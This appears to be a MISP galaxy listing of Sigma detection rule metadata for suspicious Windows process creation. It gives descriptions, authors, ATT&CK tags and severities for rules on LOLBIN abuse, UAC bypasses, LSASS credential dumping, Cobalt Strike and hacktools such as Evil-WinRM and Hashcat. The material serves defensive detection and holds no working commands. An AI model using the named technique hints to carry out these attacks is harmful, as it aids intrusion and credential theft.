falsepositive ['False postitve can occur in cases where admin scripts levreage the "exec" flag to execute applications']
filename proc_creation_win_diskshadow_child_process_susp.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Application Terminated Via Wmic.EXE

Detects calls to the "terminate" function via wmic in order to kill an application

Internal MISP references

UUID 49d9671b-0a0a-4c09-8280-d215bfd30662 which can be used as unique global reference for Application Terminated Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-09-11
falsepositive ['Unknown']
filename proc_creation_win_wmic_terminate_application.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047']
Related clusters

To see the related clusters, click here.

PUA - Nimgrab Execution

Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.

Internal MISP references

UUID 74a12f18-505c-4114-8d0b-8448dd5485c6 which can be used as unique global reference for PUA - Nimgrab Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-08-28
falsepositive ['Legitimate use of Nim on a developer systems']
filename proc_creation_win_pua_nimgrab.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command-and-control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

HackTool - WinRM Access Via Evil-WinRM

Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.

Internal MISP references

UUID a197e378-d31b-41c0-9635-cfdf1c1bb423 which can be used as unique global reference for HackTool - WinRM Access Via Evil-WinRM in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-01-07
falsepositive ['Unknown']
filename proc_creation_win_hktl_evil_winrm.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.lateral-movement', 'attack.t1021.006']
Related clusters

To see the related clusters, click here.

HackTool - Hashcat Password Cracker Execution

Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against

Internal MISP references

UUID 39b31e81-5f5f-4898-9c0e-2160cfc0f9bf which can be used as unique global reference for HackTool - Hashcat Password Cracker Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021-12-27
falsepositive ['Tools that use similar command line flags and values']
filename proc_creation_win_hktl_hashcat.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential-access', 'attack.t1110.002']
Related clusters

To see the related clusters, click here.

Forfiles.EXE Child Process Masquerading

Detects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory.

Internal MISP references

UUID f53714ec-5077-420e-ad20-907ff9bb2958 which can be used as unique global reference for Forfiles.EXE Child Process Masquerading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Anish Bogati
creation_date 2024-01-05
falsepositive ['Unknown']
filename proc_creation_win_forfiles_child_process_masquerading.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1036']
Related clusters

To see the related clusters, click here.

Permission Misconfiguration Reconnaissance Via Findstr.EXE

Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords. This was seen being used in combination with "icacls" and other utilities to spot misconfigured files or folders permissions.

Internal MISP references

UUID 47e4bab7-c626-47dc-967b-255608c9a920 which can be used as unique global reference for Permission Misconfiguration Reconnaissance Via Findstr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-12
falsepositive ['Unknown']
filename proc_creation_win_findstr_recon_everyone.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential-access', 'attack.t1552.006']
Related clusters

To see the related clusters, click here.

Arbitrary MSI Download Via Devinit.EXE

Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system

Internal MISP references

UUID 90d50722-0483-4065-8e35-57efaadd354d which can be used as unique global reference for Arbitrary MSI Download Via Devinit.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-01-11
falsepositive ['Unknown']
filename proc_creation_win_devinit_lolbin_usage.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense-evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Read Contents From Stdin Via Cmd.EXE

Detect the use of "<" to read and potentially execute a file via cmd.exe

Internal MISP references

UUID 241e802a-b65e-484f-88cd-c2dc10f9206d which can be used as unique global reference for Read Contents From Stdin Via Cmd.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-03-07
falsepositive ['Unknown']
filename proc_creation_win_cmd_stdin_redirect.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.003']
Related clusters

To see the related clusters, click here.

Potential Password Spraying Attempt Using Dsacls.EXE

Detects possible password spraying attempts using Dsacls

Internal MISP references

UUID bac9fb54-2da7-44e9-988f-11e9a5edbc0c which can be used as unique global reference for Potential Password Spraying Attempt Using Dsacls.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-06-20
falsepositive ['Legitimate use of dsacls to bind to an LDAP session']
filename proc_creation_win_dsacls_password_spray.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Use of Pcalua For Execution

Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.

Internal MISP references

UUID 0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2 which can be used as unique global reference for Use of Pcalua For Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
creation_date 2022-06-14
falsepositive ['Legitimate use by a via a batch script or by an administrator.']
filename proc_creation_win_lolbin_pcalua.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Potential CobaltStrike Process Patterns

Detects potential process patterns related to Cobalt Strike beacon activity

Internal MISP references

UUID f35c5d71-b489-4e22-a115-f003df287317 which can be used as unique global reference for Potential CobaltStrike Process Patterns in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2021-07-27
falsepositive ['Unknown']
filename proc_creation_win_hktl_cobaltstrike_process_patterns.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Suspicious Use of PsLogList

Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs

Internal MISP references

UUID aae1243f-d8af-40d8-ab20-33fc6d0c55bc which can be used as unique global reference for Suspicious Use of PsLogList in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2021-12-18
falsepositive ['Another tool that uses the command line switches of PsLogList', 'Legitimate use of PsLogList by an administrator']
filename proc_creation_win_sysinternals_psloglist.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1087', 'attack.t1087.001', 'attack.t1087.002']
Related clusters

To see the related clusters, click here.

Suspicious DLL Loaded via CertOC.EXE

Detects when a user installs certificates by using CertOC.exe to load the target DLL file.

Internal MISP references

UUID 84232095-ecca-4015-b0d7-7726507ee793 which can be used as unique global reference for Suspicious DLL Loaded via CertOC.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-02-15
falsepositive ['Unknown']
filename proc_creation_win_certoc_load_dll_susp_locations.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Add Insecure Download Source To Winget

Detects usage of winget to add a new insecure (http) download source. Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)

Internal MISP references

UUID 81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2 which can be used as unique global reference for Add Insecure Download Source To Winget in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-04-17
falsepositive ['False positives might occur if the users are unaware of such control checks']
filename proc_creation_win_winget_add_insecure_custom_source.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Use Of The SFTP.EXE Binary As A LOLBIN

Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag

Internal MISP references

UUID a85ffc3a-e8fd-4040-93bf-78aff284d801 which can be used as unique global reference for Use Of The SFTP.EXE Binary As A LOLBIN in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-11-10
falsepositive ['Unknown']
filename proc_creation_win_lolbin_sftp.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.execution', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Renamed Mavinject.EXE Execution

Detects the execution of a renamed version of the "Mavinject" process. Which can be abused to perform process injection using the "/INJECTRUNNING" flag

Internal MISP references

UUID e6474a1b-5390-49cd-ab41-8d88655f7394 which can be used as unique global reference for Renamed Mavinject.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Florian Roth
creation_date 2022-12-05
falsepositive ['Unlikely']
filename proc_creation_win_renamed_mavinject.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1055.001', 'attack.t1218.013']
Related clusters

To see the related clusters, click here.

Remote Access Tool - Team Viewer Session Started On Windows Host

Detects the command line executed when TeamViewer starts a session started by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.

Internal MISP references

UUID ab70c354-d9ac-4e11-bbb6-ec8e3b153357 which can be used as unique global reference for Remote Access Tool - Team Viewer Session Started On Windows Host in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Josh Nickels, Qi Nan
creation_date 2024-03-11
falsepositive ['Legitimate usage of TeamViewer']
filename proc_creation_win_remote_access_tools_teamviewer_incoming_connection.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.initial-access', 'attack.t1133']
Related clusters

To see the related clusters, click here.

Renamed CreateDump Utility Execution

Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory

Internal MISP references

UUID 1a1ed54a-2ba4-4221-94d5-01dee560d71e which can be used as unique global reference for Renamed CreateDump Utility Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-09-20
falsepositive ['Command lines that use the same flags']
filename proc_creation_win_renamed_createdump.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1036', 'attack.t1003.001', 'attack.credential-access']
Related clusters

To see the related clusters, click here.

Potential Credential Dumping Via LSASS Process Clone

Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity

Internal MISP references

UUID c8da0dfd-4ed0-4b68-962d-13c9c884384e which can be used as unique global reference for Potential Credential Dumping Via LSASS Process Clone in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Samir Bousseaden
creation_date 2021-11-27
falsepositive ['Unknown']
filename proc_creation_win_lsass_process_clone.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.credential-access', 'attack.t1003', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

CMSTP Execution Process Creation

Detects various indicators of Microsoft Connection Manager Profile Installer execution

Internal MISP references

UUID 7d4cdc5a-0076-40ca-aac8-f7e714570e47 which can be used as unique global reference for CMSTP Execution Process Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nik Seetharaman
creation_date 2018-07-16
falsepositive ['Legitimate CMSTP use (unlikely in modern enterprise environments)']
filename proc_creation_win_cmstp_execution_by_creation.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.execution', 'attack.t1218.003', 'attack.g0069', 'car.2019-04-001']
Related clusters

To see the related clusters, click here.

Suspicious Recursive Takeown

Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders

Internal MISP references

UUID 554601fb-9b71-4bcc-abf4-21a611be4fde which can be used as unique global reference for Suspicious Recursive Takeown in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-01-30
falsepositive ['Scripts created by developers and admins', 'Administrative activity']
filename proc_creation_win_takeown_recursive_own.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1222.001']
Related clusters

To see the related clusters, click here.

Process Execution From A Potentially Suspicious Folder

Detects a potentially suspicious execution from an uncommon folder.

Internal MISP references

UUID 3dfd06d2-eaf4-4532-9555-68aca59f57c4 which can be used as unique global reference for Process Execution From A Potentially Suspicious Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Tim Shelton
creation_date 2019-01-16
falsepositive ['Unknown']
filename proc_creation_win_susp_execution_path.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1036']
Related clusters

To see the related clusters, click here.

Execution Of Non-Existing File

Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)

Internal MISP references

UUID 71158e3f-df67-472b-930e-7d287acaa3e1 which can be used as unique global reference for Execution Of Non-Existing File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems)
creation_date 2021-12-09
falsepositive ['Unknown']
filename proc_creation_win_susp_image_missing.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion']

PowerShell Base64 Encoded WMI Classes

Detects calls to base64 encoded WMI class such as "Win32_ShadowCopy", "Win32_ScheduledJob", etc.

Internal MISP references

UUID 1816994b-42e1-4fb1-afd2-134d88184f71 which can be used as unique global reference for PowerShell Base64 Encoded WMI Classes in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-01-30
falsepositive ['Unknown']
filename proc_creation_win_powershell_base64_wmi_classes.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.defense-evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

PUA - NirCmd Execution

Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity

Internal MISP references

UUID 4e2ed651-1906-4a59-a78a-18220fca1b22 which can be used as unique global reference for PUA - NirCmd Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-01-24
falsepositive ['Legitimate use by administrators']
filename proc_creation_win_pua_nircmd.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1569.002', 'attack.s0029']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Call To Win32_NTEventlogFile Class

Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script

Internal MISP references

UUID caf201a9-c2ce-4a26-9c3a-2b9525413711 which can be used as unique global reference for Potentially Suspicious Call To Win32_NTEventlogFile Class in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-07-13
falsepositive ['Unknown']
filename proc_creation_win_susp_nteventlogfile_usage.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion']

Operator Bloopers Cobalt Strike Modules

Detects Cobalt Strike module/commands accidentally entered in CMD shell

Internal MISP references

UUID 4f154fb6-27d1-4813-a759-78b93e0b9c48 which can be used as unique global reference for Operator Bloopers Cobalt Strike Modules in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author _pete_0, TheDFIRReport
creation_date 2022-05-06
falsepositive ['Unknown']
filename proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.003']
Related clusters

To see the related clusters, click here.

Wab/Wabmig Unusual Parent Or Child Processes

Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity

Internal MISP references

UUID 63d1ccc0-2a43-4f4b-9289-361b308991ff which can be used as unique global reference for Wab/Wabmig Unusual Parent Or Child Processes in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-12
falsepositive ['Unknown']
filename proc_creation_win_wab_unusual_parents.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.execution']

UAC Bypass Using Windows Media Player - Process

Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)

Internal MISP references

UUID 0058b9e5-bcd7-40d4-9205-95ca5a16d7b2 which can be used as unique global reference for UAC Bypass Using Windows Media Player - Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021-08-23
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_wmp.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Bypass UAC via CMSTP

Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files

Internal MISP references

UUID e66779cc-383e-4224-a3a4-267eeb585c40 which can be used as unique global reference for Bypass UAC via CMSTP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
creation_date 2019-10-24
falsepositive ['Legitimate use of cmstp.exe utility by legitimate user']
filename proc_creation_win_uac_bypass_cmstp.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1548.002', 'attack.t1218.003']
Related clusters

To see the related clusters, click here.

Dllhost.EXE Execution Anomaly

Detects a "dllhost" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.

Internal MISP references

UUID e7888eb1-13b0-4616-bd99-4bc0c2b054b9 which can be used as unique global reference for Dllhost.EXE Execution Anomaly in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-06-27
falsepositive ['Unlikely']
filename proc_creation_win_dllhost_no_cli_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1055']
Related clusters

To see the related clusters, click here.

Suspicious Command Patterns In Scheduled Task Creation

Detects scheduled task creation using "schtasks" that contain potentially suspicious or uncommon commands

Internal MISP references

UUID f2c64357-b1d2-41b7-849f-34d2682c0fad which can be used as unique global reference for Suspicious Command Patterns In Scheduled Task Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-02-23
falsepositive ['Software installers that run from temporary folders and also install scheduled tasks are expected to generate some false positives']
filename proc_creation_win_schtasks_susp_pattern.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.execution', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

Execute Files with Msdeploy.exe

Detects file execution using the msdeploy.exe lolbin

Internal MISP references

UUID 646bc99f-6682-4b47-a73a-17b1b64c9d34 which can be used as unique global reference for Execute Files with Msdeploy.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Beyu Denis, oscd.community
creation_date 2020-10-18
falsepositive ['System administrator Usage']
filename proc_creation_win_lolbin_msdeploy.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

System Information Discovery via Registry Queries

Detects attempts to query system information directly from the Windows Registry.

Internal MISP references

UUID 0022869c-49f7-4ff2-ba03-85ac42ddac58 which can be used as unique global reference for System Information Discovery via Registry Queries in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author lazarg
creation_date 2025-06-12
falsepositive ['Unlikely']
filename proc_creation_win_discovery_via_reg_queries.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1082']
Related clusters

To see the related clusters, click here.

Recon Command Output Piped To Findstr.EXE

Detects the execution of a potential recon command where the results are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" via the "/c" or "/k" for example. Attackers often time use this technique to extract specific information they require in their reconnaissance phase.

Internal MISP references

UUID ccb5742c-c248-4982-8c5c-5571b9275ad3 which can be used as unique global reference for Recon Command Output Piped To Findstr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), frack113
creation_date 2023-07-06
falsepositive ['Unknown']
filename proc_creation_win_findstr_recon_pipe_output.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1057']
Related clusters

To see the related clusters, click here.

Suspicious Child Process Of SQL Server

Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection.

Internal MISP references

UUID 869b9ca7-9ea2-4a5a-8325-e80e62f75445 which can be used as unique global reference for Suspicious Child Process Of SQL Server in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author FPT.EagleEye Team, wagga
creation_date 2020-12-11
falsepositive No established falsepositives
filename proc_creation_win_mssql_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.t1505.003', 'attack.t1190', 'attack.initial-access', 'attack.persistence', 'attack.privilege-escalation']
Related clusters

To see the related clusters, click here.

Potential Suspicious Mofcomp Execution

Detects execution of the "mofcomp" utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline. The "mofcomp" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository. Attackers abuse this utility to install malicious MOF scripts

Internal MISP references

UUID 1dd05363-104e-4b4a-b963-196a534b03a1 which can be used as unique global reference for Potential Suspicious Mofcomp Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-07-12
falsepositive ['Unknown']
filename proc_creation_win_mofcomp_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

UAC Bypass Using IEInstal - Process

Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)

Internal MISP references

UUID 80fc36aa-945e-4181-89f2-2f907ab6775d which can be used as unique global reference for UAC Bypass Using IEInstal - Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021-08-30
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_ieinstal.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Uncommon Child Process Of Appvlp.EXE

Detects uncommon child processes of Appvlp.EXE Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands. Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder or to mark a file as a system file.

Internal MISP references

UUID 9c7e131a-0f2c-4ae0-9d43-b04f4e266d43 which can be used as unique global reference for Uncommon Child Process Of Appvlp.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sreeman
creation_date 2020-03-13
falsepositive ['Unknown']
filename proc_creation_win_appvlp_uncommon_child_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.t1218', 'attack.defense-evasion', 'attack.execution']
Related clusters

To see the related clusters, click here.

Suspicious Microsoft Office Child Process

Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)

Internal MISP references

UUID 438025f9-5856-4663-83f7-52f878a70a50 which can be used as unique global reference for Suspicious Microsoft Office Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io
creation_date 2018-04-06
falsepositive ['Unknown']
filename proc_creation_win_office_susp_child_processes.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.execution', 'attack.t1047', 'attack.t1204.002', 'attack.t1218.010']
Related clusters

To see the related clusters, click here.

Cloudflared Tunnel Connections Cleanup

Detects execution of the "cloudflared" tool with the tunnel "cleanup" flag in order to cleanup tunnel connections.

Internal MISP references

UUID 7050bba1-1aed-454e-8f73-3f46f09ce56a which can be used as unique global reference for Cloudflared Tunnel Connections Cleanup in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-05-17
falsepositive ['Legitimate usage of Cloudflared.']
filename proc_creation_win_cloudflared_tunnel_cleanup.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command-and-control', 'attack.t1102', 'attack.t1090', 'attack.t1572']
Related clusters

To see the related clusters, click here.

Arbitrary File Download Via IMEWDBLD.EXE

Detects usage of "IMEWDBLD.exe" to download arbitrary files

Internal MISP references

UUID 863218bd-c7d0-4c52-80cd-0a96c09f54af which can be used as unique global reference for Arbitrary File Download Via IMEWDBLD.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel
creation_date 2023-11-09
falsepositive ['Unknown']
filename proc_creation_win_imewbdld_download.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.execution', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Potential Encoded PowerShell Patterns In CommandLine

Detects specific combinations of encoding methods in PowerShell via the commandline

Internal MISP references

UUID cdf05894-89e7-4ead-b2b0-0a5f97a90f2f which can be used as unique global reference for Potential Encoded PowerShell Patterns In CommandLine in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
creation_date 2020-10-11
falsepositive ['Unknown']
filename proc_creation_win_powershell_encoding_patterns.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious Msbuild Execution By Uncommon Parent Process

Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process

Internal MISP references

UUID 33be4333-2c6b-44f4-ae28-102cdbde0a31 which can be used as unique global reference for Suspicious Msbuild Execution By Uncommon Parent Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-11-17
falsepositive ['Unknown']
filename proc_creation_win_msbuild_susp_parent_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion']

Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 2

Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.

Internal MISP references

UUID c98f2a0d-e1b8-4f76-90d3-359caf88d6b9 which can be used as unique global reference for Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 2 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @Kostastsale, TheDFIRReport
creation_date 2022-12-05
falsepositive ['Unknown']
filename proc_creation_win_susp_emoji_usage_in_cli_2.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion']

Indirect Inline Command Execution Via Bash.EXE

Detects execution of Microsoft bash launcher with the "-c" flag. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.

Internal MISP references

UUID 5edc2273-c26f-406c-83f3-f4d948e740dd which can be used as unique global reference for Indirect Inline Command Execution Via Bash.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021-11-24
falsepositive ['Unknown']
filename proc_creation_win_bash_command_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Suspicious Parent Double Extension File Execution

Detect execution of suspicious double extension files in ParentCommandLine

Internal MISP references

UUID 5e6a80c8-2d45-4633-9ef4-fa2671a39c5c which can be used as unique global reference for Suspicious Parent Double Extension File Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-01-06
falsepositive ['Unknown']
filename proc_creation_win_susp_double_extension_parent.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1036.007']
Related clusters

To see the related clusters, click here.

Setup16.EXE Execution With Custom .Lst File

